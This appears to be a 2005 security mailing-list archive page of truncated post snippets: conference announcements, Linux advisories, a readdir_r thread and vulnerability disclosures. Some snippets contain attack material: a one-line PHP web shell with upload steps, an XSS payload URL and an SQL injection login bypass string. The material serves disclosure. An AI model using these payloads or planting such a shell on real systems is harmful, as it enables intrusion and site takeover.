url: http://eusecwest.com
url: http://pacsec.jp
(PacSec/Tokyo Announcement below...)
EUSecWest/core06 CALL FOR PAPERS
London Security Summit February 20/21 2006
LONDON, United Kingdom -- Applied technical security
will be the focus of a new annual conference
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200511-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200511-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 886-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
November 7th, 2005
** Inge Henriksen Security Advisory [EMAIL PROTECTED] **
I have discovered a buffer overflow in FileZilla Server Terminal 0.9.4d. The
exploit is still to be considered as a work in progress as it is still not
clear to me why the exploit works on some systems and not others. Please let me
know
SEC-CONSULT Security Advisory 20051107-1
===
title: Macromedia Flash Player ActionDefineFunction
Memory Corruption
program: Macromedia Flash Plugin
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 884-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
November 7th, 2005
names.co.uk is an English registrar and web hosting company.
Their frames-based hosting option has an XSS vulnerability allowing injection
of arbitrary Javascript. For example:
http://www.weddingbiz.co.uk/%22%3E%3Cframe%20src%3D%22javascript%3Aalert%281%29%22%20
According to webhosting.info,
On 06 Nov 05, at 01:00, [EMAIL PROTECTED] wrote:
Then you never really understood the implementation, seems. Of
course
all implementations keep the content of the directory as read with
getdents or so in the DIR descriptor. But it is usually not the case
that the whole content fits into the
upload phpshell in PHPFM
discovered by rUnViRuS
www.worlddefacers.net
www.security-arab.com
=-=-=-=-=-=-=-=-=
the code shell :-
---
pre
?
passthru($_GET['cmd']);
?
save as cmd.php
now upload in PHPFM
=-=-=-=
Used Shell
=-=-=-=
www.site.com/[file upload
Fast translation of benji's advisory
***
Author : benjilenoob
WebSite : http://benji.redkod.org/ and http://www.redkod.org/
Audit in pdf : http://benji.redkod.org/audits/ipb.2.1.pdf
Product : Invision power board
Version
Assurance.com.au - Vulnerability Advisory
---
Release Date:
07-Nov-2005
Software:
Asterisk Web-VoiceMail (Comedian VoiceMail)
http://www.asterisk.org/
Asterisk is a complete PBX in software. It runs on Linux, BSD and MacOSX and
provides all of
Guestbook 2.2 webapplication (PHP, MySQL) appears vulnerable to SQL Injection
granting the attacker administrator access.
Target :
http://www.example.com/[GuestbookTarget]/admin.php
Username: ' or 1=1 /*
Password: (Nothing)(Blank)
It`s Working On Advanced Guestbook 2.2 version 2.3.1 will
You are right
mamboserver soloution is available now:
The fix is easy,
in /component/com_content/content.php
Approx Line 190 Change the block FROM:
Code:
// Paramters
$params = new stdClass();
if ( $Itemid ) {
$menu = new mosMenu( $database );
On 11/5/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
Why not:
4. Require the readdir() implementation to use state local to dirp.
I've never understood the rationale behind readdir_r;
Then you never really understood the implementation, seems. Of course
all implementations keep the
Then you never really understood the implementation, seems. Of course
all implementations keep the content of the directory as read with
getdents or so in the DIR descriptor. But it is usually not the case
that the whole content fits into the buffer allocated. One could, of
course, resize the
On 11/6/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
I don't see how that is relevant; the typical use of readdir() is as follows:
DIR *dirp = opendir(name);
while ((dent = readdir(dirp)) != NULL) {
...
}
closedir(dirp);
Nothing other
On 11/6/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
I don't see how that is relevant; the typical use of readdir() is as follows:
DIR *dirp = opendir(name);
while ((dent = readdir(dirp)) != NULL) {
...
}
closedir(dirp);
Nothing other
You get insert a highscore into game_score.php using post method. The system
uses these variables, so a simple form will allow you to add a highscore.
$player_name = $_POST['name'];
$player_score = $_POST['score'];
$game_name = $_POST['game'];
willeh
willey_wonka at hotmail dot com
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Advisory:Multiple vulnerabilities in PHPlist
Name:TKADV2005-11-001
Revision:1.0
Release Date:2005/11/07
Last Modified: 2005/11/07
Author: Tobias Klein (tk
Sony Vaio laptops require you to create a user account the first time you start
your laptop. If the user you select is not Administrator, Sony still goes
ahead and creates a user Administrator with a blank password.
This user does not show up in control panel under User Accounts but if you do
21 matches
Mail list logo